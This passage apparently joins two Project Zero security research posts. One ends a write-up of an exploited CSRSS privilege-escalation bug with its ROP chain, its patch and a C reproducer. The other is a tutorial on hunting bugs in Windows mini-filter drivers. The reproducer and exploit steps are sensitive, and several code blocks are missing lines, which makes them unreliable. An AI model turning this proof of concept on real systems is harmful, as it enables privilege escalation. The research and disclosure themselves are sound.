6. Leak the stack register. In this step the exploit takes full advantage of the shared memory region. First, it calls setjmp to leak the register state into the shared region. The next module entry points to itself, so the execution enters an infinite loop of NtYieldExecution calls. In the meantime, the sandboxed process detects that the data in the setjmp buffer has been modified. It calculates the return address location for the LdrpInitializeThread stack frame, sets it as the destination address for a subsequent copy operation, and modifies the InLoadOrderModuleList pointer of the current module entry, thus breaking the loop.

7. Overwrite the return address. After the exploit exits the loop in csrss.exe, it performs two more copy operations: overwrites the return address with a stack pivot pointer, and puts the fake stack address next to it. Then, when LdrpInitializeThread returns, the execution continues in the ROP chain.

8. Transition to winlogon.exe. The ROP payload creates a new memory section and shares it with both winlogon.exe, which is another highly-privileged Windows process, and the sandboxed process. Then it creates a new thread in winlogon.exe using an address inside the section as the entry point. The sandboxed process writes the final stage of the exploit to the section, which downloads and executes an implant. The rest of the ROP payload is needed to restore the normal state of csrss.exe and terminate the error reporting thread.

The fix

We reported the issue to Microsoft on March 23. Similarly to the font bugs, it was subject to a 7-day deadline used by Project Zero for actively exploited vulnerabilities, but after receiving a request from the vendor, we agreed to provide an extension due to the global circumstances surrounding COVID-19. The fix came out 22 days after our report.

The patch renamed BaseSrvSxsCreateActivationContext into BaseSrvSxsCreateActivationContextFromMessage and added an extra CsrValidateMessageBuffer call for the ApplicationName field, this time with MaximumLength as the size argument:

ApplicationName = ApiMessage->CreateActivationContext.ApplicationName;

if (ApplicationName.MaximumLength &&

    !CsrValidateMessageBuffer(ApiMessage, &ApplicationName.Buffer,

                              ApplicationName.MaximumLength, 1)) {

  SavedMaximumLength = ApplicationName.MaximumLength;

  ApplicationName.MaximumLength = ApplicationName.Length + 2;



if (SavedMaximumLength)

  ApiMessage->CreateActivationContext.ApplicationName.MaximumLength =


return result;

Appendix A

The following reproducer has been tested on Windows 10.0.18363.959.

#include <stdint.h>

#include <stdio.h>

#include <windows.h>

#include <string>


    "<?xml version='1.0' encoding='UTF-8' standalone='yes'?>"

    "<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>"

    "<assemblyIdentity name='@' version='' type='win32' "



const WCHAR* NULL_BYTE_STR = L"\x00\x00";




const WCHAR* PATH = L"\\\\.\\c:Windows\\";

const WCHAR* MODULE = L"System.Data.SqlXml.Resources";

typedef PVOID(__stdcall* f_CsrAllocateCaptureBuffer)(ULONG ArgumentCount,

                                                     ULONG BufferSize);

f_CsrAllocateCaptureBuffer CsrAllocateCaptureBuffer;

typedef NTSTATUS(__stdcall* f_CsrClientCallServer)(PVOID ApiMessage,

                                                   PVOID CaptureBuffer,

                                                   ULONG ApiNumber,

                                                   ULONG DataLength);

f_CsrClientCallServer CsrClientCallServer;

typedef NTSTATUS(__stdcall* f_CsrCaptureMessageString)(LPVOID CaptureBuffer,

                                                       PCSTR String,

                                                       ULONG Length,

                                                       ULONG MaximumLength,

                                                       PSTR OutputString);

f_CsrCaptureMessageString CsrCaptureMessageString;

NTSTATUS CaptureUnicodeString(LPVOID CaptureBuffer, PSTR OutputString,

                              PCWSTR String, ULONG Length = 0) {

  if (Length == 0) {

    Length = lstrlenW(String);


  return CsrCaptureMessageString(CaptureBuffer, (PCSTR)String, Length * 2,

                                 Length * 2 + 2, OutputString);


int main() {

  HMODULE Ntdll = LoadLibrary(L"Ntdll.dll");

  CsrAllocateCaptureBuffer = (f_CsrAllocateCaptureBuffer)GetProcAddress(

      Ntdll, "CsrAllocateCaptureBuffer");

  CsrClientCallServer =

      (f_CsrClientCallServer)GetProcAddress(Ntdll, "CsrClientCallServer");

  CsrCaptureMessageString = (f_CsrCaptureMessageString)GetProcAddress(

      Ntdll, "CsrCaptureMessageString");

  char Message[0x220];

  memset(Message, 0, 0x220);

  PVOID CaptureBuffer = CsrAllocateCaptureBuffer(4, 0x300);

  std::string Manifest = MANIFEST_CONTENTS;

  Manifest.replace(Manifest.find('@'), 1, 0x2000, 'A');

  // There's no public definition of the relevant CSR_API_MSG structure.

  // The offsets and values are taken directly from the exploit.

  *(uint32_t*)(Message + 0x40) = 0xc1;

  *(uint16_t*)(Message + 0x44) = 9;

  *(uint16_t*)(Message + 0x59) = 0x201;

  // CSRSS loads the manifest contents from the client process memory;

  // therefore, it doesn't have to be stored in the capture buffer.

  *(const char**)(Message + 0x80) = Manifest.c_str();

  *(uint64_t*)(Message + 0x88) = Manifest.size();

  *(uint64_t*)(Message + 0xf0) = 1;

  CaptureUnicodeString(CaptureBuffer, Message + 0x48, NULL_BYTE_STR, 2);

  CaptureUnicodeString(CaptureBuffer, Message + 0x60, MANIFEST_NAME);

  CaptureUnicodeString(CaptureBuffer, Message + 0xc8, PATH);

  CaptureUnicodeString(CaptureBuffer, Message + 0x120, MODULE);

  // Triggers the issue by setting ApplicationName.MaxLength to a large value.

  *(uint16_t*)(Message + 0x122) = 0x8000;

  CsrClientCallServer(Message, CaptureBuffer, 0x10017, 0xf0);


This is part 6 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Hunting for Bugs in Windows Mini-Filter Drivers

Posted by James Forshaw, Project Zero

In December Microsoft fixed 4 issues in Windows in the Cloud Filter and Windows Overlay Filter (WOF) drivers (CVE-2020-17103, CVE-2020-17134, CVE-2020-17136, CVE-2020-17139). These 4 issues were 3 local privilege escalations and a security feature bypass, and they were all present in Windows file system filter drivers. I’ve found a number of issues in filter drivers previously, including 6 in the LUAFV driver which implements UAC file virtualization.

 The purpose of a file system filter driver according to Microsoft is:

“A file system filter driver can filter I/O operations for one or more file systems or file system volumes. Depending on the nature of the driver, filter can mean log, observe, modify, or even prevent. Typical applications for file system filter drivers include antivirus utilities, encryption programs, and hierarchical storage management systems.”

What this boils down to is the filter driver can inspect and modify almost any IO request sent to a file system. This power comes with many responsibilities, and considering the complexity of the IO model on Windows it can be hard to avoid introducing subtle bugs.

With the issues being fixed I thought would be a good opportunity to go into a bit more detail on how you can research file system filter drivers, specifically the kind of things I looked at to find my security vulnerabilities. I’m going to give an overview of how filter drivers work, how you communicate with them, some hints on reverse engineering and some of the common security issues you might discover. I’ll also provide some basic example code to give you a basic idea of some common coding patterns. The goal is to allow you to do your own research in this area.

I’m assuming you have some prior knowledge on how the IO Manager works and have experience in finding security issues in non-filter drivers. Also I’m not claiming this to be an exhaustive description of bug hunting in filter drivers as the topic is very deep and complex. With this in mind let’s start with an overview of how a filter driver works.

Filter Driver Implementation

A filter driver exploits the way the Windows IO Manager implements file system drivers. When you make a request to access a file, such as calling the NtCreateFile system call the IO Manager allocates an IO Request Packet (IRP) structure which contains the operation type and all the parameters for the operation. The IRP is then dispatched to the top of the device stack associated with the request.

A filter driver registers for the IO requests it supports with a callback function which is invoked when a specific IO request type IRP is queued in the device stack. The driver callback can then do a number of different things to the IRP.

  • Pass the IRP unmodified directly to the next driver in the stack.
  • Modify the IRP then pass to the next driver.
  • Modify the IRP response.
  • Complete the IRP operation with a success result.
  • Complete the IRP operation with an error result.
  • Pass the IRP to a different device stack.

This is the basics of how a filter driver works, the driver is attached at a suitable point of a device stack and handles IO requests. When an IRP of interest is received it can perform one of the operations to filter requests. If it wants to inspect or modify the response it can register for the completion routine and handle the operation in the callback.

It’s important to note that the IRP doesn’t automatically propagate down the stack. A driver can choose to complete the IRP which means it’ll not be processed by any other driver down the stack. If the driver passes on the IRP the driver must register a completion routine otherwise it’ll not be notified when the IRP has been processed by the lower drivers in the stack.

For a file system filter the insertion point would typically be on top of the file system device object which is exposed by a file system driver such as NTFS. However, the driver can insert itself almost anywhere, allowing it to filter not just file system requests but also change data such as disk sectors. For example the Bitlocker Full Disk Encryption driver is a filter which is attached to the top of a volume block device. Any sectors passed in a write IRP are encrypted before passing to the lower driver. Read IRPs are handled in a completion routine and the sectors are decrypted before returning to the caller.

The Filter Manager and Mini-Filters

Implementing a filter driver from scratch is quite complicated. You have to handle every single IO request type, even if you don’t care about it, so that it can be forwarded to the next driver in the stack. You also have to find the correct point to insert your filter driver into the device stack. It’s easy to attach a driver to the top of the stack but trying to insert in the middle of an existing stack can be a recipe for disaster, for example the ordering of the filter drivers in the stack might differ depending on load order.

To make it easier to write a filter driver Windows comes with the Filter Manager Driver which takes care of handling IO requests and device stacks. This allows a developer to write what’s called a mini-filter driver instead of a, now named, legacy filter driver. The following diagram shows how the architecture changes when you introduce the filter manager.

As you can see the mini-filters don’t add their own device objects to the stack. Instead they are registered with the filter manager and it’s the filter manager which inserts its own device. The filter manager handles the IO requests and calls registered mini-filters to process the request. If your mini-filter doesn’t support a certain IO request then the filter manager implements a default which handles passing the IRP on to the next driver in the stack.

Another useful feature is the filter manager implements a mechanism for ordering the mini-filters, through an altitude value. The higher the altitude value the higher the priority. For example, a filter at altitude 10000 will be called before a filter at altitude 5000 when making a IO request. When handling responses the altitudes processed in reverse order, so the filter at 5000 will be called first then the one at 10000. Officially the altitude values must be registered with Microsoft. MSDN contains a list of the currently registered altitudes. However, there’s nothing to stop a driver from registering itself with a different altitude except it’ll likely draw the ire of Microsoft and might fail certification. By formalizing the altitude values you avoid the risk that a filter driver’s ordering may change depending on load order.

Mini-Filter Registration

A mini-filter driver registers its presence by calling the FltRegisterFilter filter manager API, normally during the driver’s entry point. The main parameter is a FLT_REGISTRATION structure which defines all the various callbacks for handling IO requests and bookkeeping. The important fields are the callbacks which a driver can register to respond to events from the filter manager. You can view what filters are registered with the filter manager using the fltmc command line tool (must be run as an administrator).

C:\> fltmc

Filter Name                     Num Instances    Altitude    Frame

------------------------------  -------------  ------------  -----

bindflt                                 1       409800         0

WdFilter                               17       328010         0

storqosflt                              1       244000         0

wcifs                                   0       189900         0

CldFlt                                  0       180451         0

FileCrypt                               0       141100         0

luafv                                   1       135000         0

npsvctrig                               1        46000         0

Wof                                    14        40700         0

FileInfo                               17        40500         0

We can see all the mini-filters registered, the number of instances which indicates the number of volumes that’s been attached and the altitude. There are 19 volumes available for filtering in the system I tested on (according to running fltmc volumes) so no filter is attached to everything. A driver can select and decide what volumes it wants to attach to by assigning an instance setup callback to the InstanceSetupCallback field in the filter registration structure. This callback is invoked for every volume on the system, including new ones added after the filter starts. The callback can return the status code STATUS_FLT_DO_NOT_ATTACH to block attachment.

You can view what volumes a filter is attached to using fltmc again:

C:\> fltmc instances -f luafv

Instances for luafv filter:

Volume Name     Altitude        Instance Name       Frame  VlStatus

------------- ------------  ----------------------  -----  --------

C:               135000     luafv                     0

This just shows the volume that LUAFV is attached to. As UAC virtualization only makes sense in the context of the system drive then it’s only attached to C:. You can manually attach and detach filters on volumes using the fltmc tool with the attach and detach commands, we’ll show an example of using these commands later.

NOTE: Just because a filter driver is attached to a volume it doesn’t mean it’ll filter any IO requests for that volume. For example, the WOF driver is attached to all NTFS volumes, however it’ll only enable itself if there’s at least one file in the volume which is registered to be handled by WOF. Otherwise it ignores the IO request, letting it complete normally.

Most mini-filters only attach to file system volumes. However, the filter manager also supports attaching to the named pipe and mailslot devices. The filter driver indicates support by setting the FLTFL_REGISTRATION_SUPPORT_NPFS_MSFS flag in the FLT_REGISTRATION structure.

Mini-Filter IO Request Operation Callbacks

By far the most important field in the FLT_REGISTRATION structure is OperationRegistration which references a list of FLT_OPERATION_REGISTRATION structures defining the IO request callbacks. Each entry contains the IRP major code for the operation (such as IRP_MJ_CREATE or IRP_MJ_FILE_SYSTEM_CONTROL) and can have a pre-request and post-request callback. The driver doesn’t need to specify both if it doesn’t need both. The list is a variable length array, terminated with the major code being set to IRP_MJ_OPERATION_END (0x80). Any operation not in the list is handled by the filter manager which typically just ignores it and continues to the next filter in the list. A basic example of what you might see in C code is shown below.





      PostCreateOperation },



A pre-request callback accepts three parameters:

  • The parameters for the operation, specified in a FLT_CALLBACK_DATA structure.
  • Related kernel objects, in a FLT_RELATED_OBJECTS structure.
  • An output pointer which can be assigned a callback context.

The prototype of the callback function pointer is:





    PVOID *CompletionContext


The parameters for the IO request are accessible in the FLT_CALLBACK_DATA structure’s Iopb field which is an FLT_IO_PARAMETER_BLOCK structure. The parameters are similar to the ones exposed through the IRP’s current IO_STACK_LOCATION structure. The data parameter also contains the IO_STATUS_BLOCK for the request and the caller’s requestor mode (either KernelMode or UserMode). The return code from the pre-request callback function determines what the filter driver wants to do with the request. The return type FLT_PREOP_CALLBACK_STATUS can be one of the following:






The callback was successful. Pass on the IO request and get a post-operation callback after completion.



The callback was successful. Pass on the IO request. No callback required.



Mark the IO operation as pending.



If handling a Fast IO operation, fail it to force the operation as a normal IO Request.



The operation has been completed. Do not pass on the IO request to any other drivers, even other filters in the stack.



Synchronize the post-operation callback in the same thread.



Disallow FastIO file creation.

A post-request callback accepts four parameters:

  • The parameters for the operation, specified in a FLT_CALLBACK_DATA structure.
  • Related kernel objects, in a FLT_RELATED_OBJECTS structure.
  • A context pointer which could have been assigned by the pre-operation callback.
  • Additional flags.

For post-operation callbacks the prototype is as follows:





    PVOID CompletionContext,



The parameters are more or less the same as for the pre-operation callback. The CompletionContext parameter is the same one assigned in the pre-operation callback. If this value was allocated the post-operation callback needs to free the memory buffer to prevent leaking memory. The FLT_POSTOP_CALLBACK_STATUS return type can be one of the following values.






The callback was successful. No further processing required.



Halts completion of the IO request. The operation will be pending until the filter driver completes it.



Disallow FastIO file creation.

Handling IO Requests

Now that we’ve described registration of the mini-filter and its callbacks let's go through a few examples of how IO requests are handled inside the pre and post operation callbacks. We’ll use the six operations I mentioned earlier as a base for this discussion. Any examples are to demonstrate the likely code you’ll find in a driver but omits security checks and other unimportant details. This isn’t Stack Overflow, so please don’t copy and paste them into real drivers.

Pass the IO request unmodified

The simplest way of not modifying an IO request is to not specify a pre-operation callback. Of course we’re assuming the driver wants to handle an IO request selectively based on certain criteria so it must implement the callback.

The easiest way to ignore the IO request is to return the FLT_PREOP_SUCCESS_NO_CALLBACK status code from the pre-operation callback. That indicates to the filter manager that the mini-filter has completed its processing and is no longer interested in the IO request.

To give an example the following pre-create operation callback will ignore any open requests where the desired access does not request the FILE_WRITE_DATA access right. If the request doesn’t contain the access then the request is completed with no callback.





    PVOID* CompletionContext

) {

    PFLT_IO_PARAMETER_BLOCK ps = &Data->Iopb->Parameters;

    DWORD access = ps->Create.SecurityContext->DesiredAccess;

    if ((access & FILE_WRITE_DATA) == 0) {



    // Perform some operation...


The example extracts the desired access from the creation parameters. If the FILE_WRITE_DATA access right is not set then the filter driver will ignore the IO request entirely by returning the no callback status code.

Of course depending on the purpose of the filter driver it might still want the post-operation callback to be called. For example if the filter driver is monitoring file access then the post-operation callback will contain valuable information such as the success or failure of opening the file or the data read from the file. In this case it makes sense to return FLT_PREOP_SUCCESS_WITH_CALLBACK.

When the driver specified it wants a post-operation callback it can configure the CompletionContext with any value it likes. This context can then be used in the post-operation callback. This can be used to pass additional data between the callbacks so that it can perform its operation correctly.

Modify the IO request

During a pre-operation callback the driver can modify the contents of the FLT_CALLBACK_DATA structure. For example the driver could change the security context used to open the file or it could even change the name of the file itself. The driver must indicate to the filter manager that the data has been modified by setting the FLTFL_CALLBACK_DATA_DIRTY flag in the Flags field before returning. The correct way of setting the flag is to call the FltSetCallbackDataDirty API however all that currently does is set the flag.

Modify the IO request response

As with the request you can modify the response in the post-operation callback which will return the changes to higher mini-filters and the IO manager. One trick I’ve commonly seen is to use this to change the target file by modifying the file name and returning the status code STATUS_REPARSE as if the file system hand encountered a symbolic link. The following is the basic approach that the LUAFV driver uses to perform the reparse operation to an arbitrary file path in a post-operation callback.


                                        PUNICODE_STRING TargetFileName){

  LuafvSetEcp(Data, TargetFileName);

  PFILE_OBJECT FileObject = Data->Iopb->TargetFileObject;


  FileObject->FileName.Buffer = ExAllocatePool(PagedPool, 


  FileObject->FileName.MaximumLength = TargetFileName.Length;

  RtlCopyUnicodeString(&FileObject->FileName, TargetFileName);

  Data->IoStatus.Information = 0;

  Data->IoStatus.Status = STATUS_REPARSE;




The code deallocates the filename buffer in the target file object and replaces it with its own. It then sets the status code to STATUS_REPARSE and indicates that processing has finished. In Windows 7 a IoReplaceFileObjectName API was introduced which makes this operation much less error prone, however LUAFV was written for Vista where the API didn’t exist so it had to make do. An official Microsoft example can be found in the SimRep sample driver.

One quirk of this operation is the FileName in the file object is volume relative, e.g. if you opened c:\windows\notepad.exe then FileName is set to \windows\notepad.exe. However, you can replace that with an absolute path such as \??\d:\abc.txt and that still works. Also the driver doesn’t need to create a real mount point or symbolic link reparse point buffer for this to work. The IO manager will just take the path from the file object and restart the create request with the new path.

Complete the IO request with a success result

The driver can immediately complete an IO request by returning FLT_PREOP_COMPLETE from a pre-operation callback and updating the IO_STATUS_BLOCK in the FLT_CALLBACK_DATA parameter. The previous reparse example shows how that update works. If you’re only updating the IO_STATUS_BLOCK you don’t need to mark the data as dirty.

Higher level filter drivers will still get their post-operation callbacks invoked if they’re registered for them, however no lower altitude drivers will be called with the IO request.

Complete the IO request with an error result.

This is basically the same as for a success code, just specifying a different NT status. There’s nothing stopping a higher level filter driver from ignoring the error code and replacing it with a success.

Pass the IO request to a different file or device stack

The filter driver can redirect the operation to another device stack. For example you could implement a driver which redirects file reads and writes to a completely different file on the disk, making it look like the user is modifying the file when they’re not.

The most obvious way of achieving this would be to open the new file during the pre-create operation then use that file object as the target for all subsequent operations. There are two potential issues with this approach.

First, how can a filter driver interact with a file system volume it’s attached to without resulting in an infinite loop? For example, if the driver wants to open a file it can call IoCreateFile (and variants). However, the IO manager would dispatch the IO request to the top of the device stack, which would get back to the filter manager which could end up calling the filter driver again, ad infinitum. The same would be the case with any exported APIs from the kernel.

This issue is solved through two mechanisms. The first is the filter manager exposes a set of APIs which mirror the kernel IO APIs but will only dispatch the IO request to filters below the caller. For example you can call FltCreateFileEx or FltWriteFile and be sure you won’t end up in a loop.

For file creation requests the driver can also employ a second mechanism called Extra Create Parameters (ECP). An ECP is a GUID along with additional data which can be attached to the create request using the FltInsertExtraCreateParameter API. The filter driver can attach the ECP to the request, then check for its presence using FltFindExtraCreateParameter API, allowing it to ignore the request. For example the earlier code which shows how LUAFV implements a reparse operation shows calling LuafvSetEcp which sets an ECP on the request so that the new create request can be ignored by the driver.

The second issue is how do you actually pass on the parameters for the IO request to the new file you’ve opened? The naive approach would be to extract the parameters then invoke the corresponding filter manager API. For example, for a write IO request, read out the buffer and length then call FltWriteFile. This is error prone and might introduce subtle security issues.

A better approach is the driver can change the TargetFileObject field in the pre-operation callback’s FLT_IO_PARAMETER_BLOCK structure then return a success code for the IO request to continue. This will cause the filter manager to send the original IO request to the new file object. The following is a simple example which could be in a pre-operation callback which will redirect the request to a file object extracted from the file system context:

PREDIRECT_CONTEXT context = // Get driver’s allocated context.

if (context->FileObject) {

    Data->Iopb->TargetFileObject = context->FileObject;




Mini-Filter Communication

For there to be a security vulnerability the driver must process some untrustworthy data from a malicious user. What makes mini-filter drivers interesting is there's multiple places where untrusted data can be processed. Let’s go through the ways of identifying and analyzing these communication channels.

Device Object

A mini-filter doesn’t need to create any device object to perform its function, the filter manager deals with creating any necessary device objects. That doesn’t mean the driver can’t create one for its own purposes. A typical attack vector is the malicious user opens a handle to the device object and sends device IO control codes to exercise the vulnerable behavior.

I’m not going to go into details about how to analyze Windows kernel drivers for security issues in the IRP dispatch callbacks, as there’s plenty of other resources. For example: Reverse Engineering and Bug Hunting on KMDF Drivers (video, slides).

Filter Communication Ports

One unique communication mechanism which is implemented by the filter manager is Filter Communication Ports. A port can be created by a mini-filter driver by calling the exported filter manager API FltCreateCommunicationPort.







RtlInitUnicodeString(&Name, L"\\FilterPortName");


InitializeObjectAttributes(&ObjAttr, &Name, 0, NULL, SecurityDescriptor);












The name of the port is specified using an OBJECT_ATTRIBUTES structure, in this example the filter port will be called \FilterPortName in the Object Manager Namespace (OMNS). The driver should also specify the security descriptor to be associated with the port through the OBJECT_ATTRIBUTES. It’s most common to call the FltBuildDefaultSecurityDescriptor API to build a security descriptor which only grants administrators access to the port. However, the driver can configure the security any way it likes.

In FltCreateCommunicationPort the filter manager creates a new named kernel object of type FilterConnectionPort with the OBJECT_ATTRIBUTES and associates it with the callbacks. There’s no NtOpenFilterConnectionPort system call to open a port. Instead when a user wants to access the port it must first open a handle to the filter manager message device object, \FileSystem\Filters\FltMgrMsg, passing an extended attributes structure identifying the full OMNS path to the port.

It is much easier to open a port by calling the FilterConnectCommunicationPort API in user-mode, so you don’t need to deal with connecting manually. When opening a port you can also specify an arbitrary context buffer to pass to the connect callback. This can be used to configure the open port instance. On connection the connect notification callback passed to FltCreateCommunicationPort will be called. The prototype for the callback is as follows:

typedef NTSTATUS


      PFLT_PORT ClientPort,

      PVOID ServerPortCookie,

      PVOID ConnectionContext,

      ULONG SizeOfContext,

      PVOID *ConnectionPortCookie


The ConnectionContext and SizeOfContext are values passed from user-mode when calling FilterConnectCommunicationPort. The ConnectionContext has its length verified and copied into kernel memory before use. However, there’s no structure for the context so the driver must still carefully verify its contents before using it. The driver can reject a caller by returning an error NT status code. This allows the driver to do things like verify the caller is in a signed binary or similar, which is likely something security products will do.

If the connection is allowed the ConnectionPortCookie pointer can be updated with a pointer to an allocated structure unique to the client. This pointer will be passed back to the driver in the message and disconnect notification callbacks.

You can enumerate what ports are currently registered by inspecting the OMNS. For example, to enumerate the ports in the root of the OMNS using my NtObjectManager PowerShell module run the following command:

PS> ls NtObject:\ | Where-Object TypeName -eq "FilterConnectionPort"

Name                                      TypeName            

----                                      --------            

storqosfltport                            FilterConnectionPort

MicrosoftMalwareProtectionRemoteIoPortWD  FilterConnectionPort

MicrosoftMalwareProtectionVeryLowIoPortWD FilterConnectionPort

WcifsPort                                 FilterConnectionPort

MicrosoftMalwareProtectionControlPortWD   FilterConnectionPort

BindFltPort                               FilterConnectionPort

MicrosoftMalwareProtectionAsyncPortWD     FilterConnectionPort

CLDMSGPORT                                FilterConnectionPort

MicrosoftMalwareProtectionPortWD          FilterConnectionPort

You might notice there is also a FilterCommunicationPort kernel object type. This is the object used for the client-end where FilterConnectionPort is the mini-filter server end. You should never see a FilterCommunicationPort named object in the OMNS.

When the port is opened the kernel will check the security descriptor for access. Unfortunately there’s no way to directly query the assigned security descriptor for a port from user-mode. The simplest way to test is to just try and open the port and see if it returns an access denied error.

PS> $ports = ls NtObject:\ | 

Where-Object TypeName -eq "FilterConnectionPort"

PS> foreach($port in $ports.Name) {

    Write-Host "\$port"

    Use-NtObject($p = Get-FilterConnectionPort "\$port") {}



Exception: "(0x80070005) - Access is denied."


Exception: "(0x8007017C) - The cloud operation is invalid."

We can see two ports output in the previous code snippet. The BindFltPort port fails with an access denied error, while the CLDMSGPORT port (which is part of the Cloud Filter driver) returns “The cloud operation is invalid.”. The second error indicates that we’ve likely opened the port, but you’ll need to supply specific parameters in the context buffer when calling the FilterConnectCommunicationPort API. You can specify the connection context for the Get-FilterConnectionPort command by specifying a byte array to the Context parameter.

PS> $port = Get-FilterConnectionPort -Path "\PORT" -Context @(0, 1, 2, 3)

We can inspect the security descriptor for a port if you’ve got a Windows system with a kernel debugger enabled and a copy of WinDBG.

0: kd> !object \CLDMSGPORT

Object: ffffb487447ff8c0  Type: (ffffb4873d67dc40) FilterConnectionPort

    ObjectHeader: ffffb487447ff890 (new version)

    HandleCount: 1  PointerCount: 4

    Directory Object: ffff8a8889a2d4e0  Name: CLDMSGPORT

0: kd> dx (((nt!_OBJECT_HEADER*)0xffffb487447ff890)->SecurityDescriptor & ~0x7)

(((nt!_OBJECT_HEADER*)0xffffb487447ff890)->SecurityDescriptor & ~0x7) : 0xffff8a888dccb0a0

0: kd> !sd 0xffff8a888dccb0a0 1

->Revision: 0x1

->Sbz1    : 0x0

->Control : 0x9004




->Owner   : S-1-5-32-544 (Alias: BUILTIN\Administrators)

->Group   : S-1-5-18 (Well Known Group: NT AUTHORITY\SYSTEM)

->Dacl    :

->Dacl    : ->AclRevision: 0x2

->Dacl    : ->Sbz1       : 0x0

->Dacl    : ->AclSize    : 0x1c

->Dacl    : ->AceCount   : 0x1

->Dacl    : ->Sbz2       : 0x0

->Dacl    : ->Ace[0]: ->AceType: ACCESS_ALLOWED_ACE_TYPE

->Dacl    : ->Ace[0]: ->AceFlags: 0x0

->Dacl    : ->Ace[0]: ->AceSize: 0x14

->Dacl    : ->Ace[0]: ->Mask : 0x001f0001

->Dacl    : ->Ace[0]: ->SID: S-1-5-11 (Well Known Group: NT AUTHORITY\Authenticated Users)

->Sacl    :  is NULL

To dump the SD you first query for the object address of the filter communication port using the !object command. From the output you take the address of the OBJECT_HEADER structure and query the SecurityDescriptor field. Note you must clear the lower 3 bits of the address to make a valid security descriptor pointer. Finally we can print the security descriptor using the !sd command. The output shows that the security descriptor grants the Authenticated Users group access to connect to the port.

With an open handle to the port you can now send and receive messages. The filter manager supports both user to kernel and kernel to user message directions. For the user to kernel messages you call the FilterSendMessage API which sends a raw memory buffer to the filter driver and returns a separate buffer as shown in the following prototype:

HRESULT FilterSendMessage(

  HANDLE  hPort,

  LPVOID  lpInBuffer,

  DWORD   dwInBufferSize,

  LPVOID  lpOutBuffer,

  DWORD   dwOutBufferSize,

  LPDWORD lpBytesReturned


The message is delivered to the filter driver’s message notification callback specified when registering the mini-filter. The callback has the following prototype.

typedef NTSTATUS


      IN PVOID PortCookie,

      IN PVOID InputBuffer OPTIONAL,

      IN ULONG InputBufferLength,

      OUT PVOID OutputBuffer OPTIONAL,

      IN ULONG OutputBufferLength,

      OUT PULONG ReturnOutputBufferLength


The handling of the message is similar to a device IO control call. In fact under the hood it’s implemented using the device IO control code 0x8801B. As this code uses the METHOD_NEITHER method means the InputBuffer and OutputBuffer parameters are pointers into user-mode memory. The filter manager does check them before calling the callback with ProbeForRead and ProbeForWrite calls.

You can send a message to a filter connection port in PowerShell using the Send-FilterConnectionPort command specifying the data to send and the maximum size of the output buffer.

PS> Send-FilterConnectionPort -Port $port -Input @(0, 1, 2, 3) -MaximumOutput 0x100

For the kernel to user messages the user mode application needs to call FilterGetMessage to wait for the filter driver to send a message to user-mode. The kernel sends a message to the waiting user mode application using the FltSendMessage API which has the following prototype.

NTSTATUS FltSendMessage(

  PFLT_FILTER    Filter,

  PFLT_PORT      *ClientPort,

  PVOID          SenderBuffer,

  ULONG          SenderBufferLength,

  PVOID          ReplyBuffer,

  PULONG         ReplyLength,



If there’s currently no waiting user mode process the API can wait a specified timeout until the application called FilterGetMessage. The returned buffer from FilterGetMessage contains a FILTER_MESSAGE_HEADER structure followed by the data. The header contains the size of the reply requested as well as a message ID which is used to correlate any reply to the kernel’s message.

To reply the user-mode application calls the FilterReplyMessage API. The user-mode application needs to append any data to a FILTER_REPLY_HEADER structure which contains the NT status code of the operation and the correlated message ID. The FltSendMessage API waits for the user-mode application to call FilterReplyMessage with the correct ID, and returns a buffer to the kernel-mode code. The message notification callback is not involved when using kernel to user-mode calls.

Filter Callbacks

Typically the purpose of the mini-filter callbacks would be to inspect or modify pre-existing IO requests to a file system. Therefore one way of getting untrusted data to the driver is based on how it handles IO requests.  However, it’s possible to add additional functionality on top of an existing file system to allow for communication between user mode and kernel mode. The filter driver can add a callback for device or file system IO control code requests and check and handle its own control codes. This allows the filter to implement additional functionality on existing files.

The following is a simple example of adding a FSCTL_REVERSE_BYTES FS IO control code to an existing file system. This FSCTL is not really supported by any filesystem.









    PVOID* CompletionContext

) {

    PFLT_PARAMETERS ps = &Data->Iopb->Parameters;

    if (ps->DeviceIoControl.Common.IoControlCode != FSCTL_REVERSE_BYTES) {



    char* buffer = ps->DeviceIoControl.Buffered.SystemBuffer;

    ULONG length = min(ps->DeviceIoControl.Buffered.InputBufferLength,


    for (ULONG i = 0; i < length; ++i)


        char tmp = buffer[i];

        buffer[i] = buffer[length - i - 1];

        buffer[length - i - 1] = tmp;


    Data->IoStatus.Status = STATUS_SUCCESS;

    Data->IoStatus.Information = length;



The parameters for the FSCTL or IOCTL are separated based on the method of buffer access. In this case the FSCTL uses METHOD_BUFFERED so the parameters are accessed through the Buffered field. The filter driver needs to ensure it handles correctly all buffer types if it wants to implement its own control codes.

This technique is used by the Windows Overlay Filter (WOF). For example, the FSCTL code FSCTL_SET_EXTERNAL_BACKING is not supported by NTFS. Instead it’s intercepted by a pre-operation callback in the WOF filter which completes it before it reaches the NTFS driver. The NTFS driver never sees the control code, unless the WOF driver happens to not be enabled.

Reparse Points

Reparse point buffers are most commonly known for implementing symbolic link support for NTFS. However the reparse point feature of NTFS can store arbitrary tagged data which is used by filter drivers to store additional offline state information for a file. For example, WOF uses its own reparse buffer, with the tag IO_REPARSE_TAG_WOF to store the location of the real file or status of a compressed file.

A user-mode application would set, query and delete using FSCTL control codes, such as FSCTL_SET_REPARSE_POINT. The recommended way a mini-filter driver should set and delete a file’s reparse buffer is through the FltTagFile (and FltTagFileEx) and FltUntagFile APIs to set and remove the reparse buffer. Searching for the driver’s imported APIs should quickly show whether the driver uses its own reparse buffer format.

To open a file with the supported reparse point buffer the driver could register for the post-create callback and wait for any request which returns the STATUS_REPARSE NT status then query for the reparse point data from the TagData field in the FLT_CALLBACK_DATA parameter. If the reparse tag matches one the filter driver supports it can re-issue the create request but specify the FILE_OPEN_REPARSE_POINT flag to open the file and ignore the reparse point. There are many problems with this, not least it requires two IO requests for a single creation and the driver would have to process every reparse event.

To simplify this Windows 10 supports the ECP_TYPE_OPEN_REPARSE_GUID ECP. You add the ECP with a buffer containing an OPEN_REPARSE_LIST_ENTRY structure which defines the reparse tag the driver handles. When NTFS encounters a reparse point buffer it checks to see if it’s in the open reparse list. If so instead of returning STATUS_REPARSE the OPEN_REPARSE_POINT_TAG_ENCOUNTERED flag is set in the OPEN_REPARSE_LIST_ENTRY structure, the file is opened and success NT status code is returned. The filter driver can then check for the flag in the post-create callback, if set it can query the reparse tag from the file, for example using FSCTL_GET_REPARSE_POINT and handle accordingly.

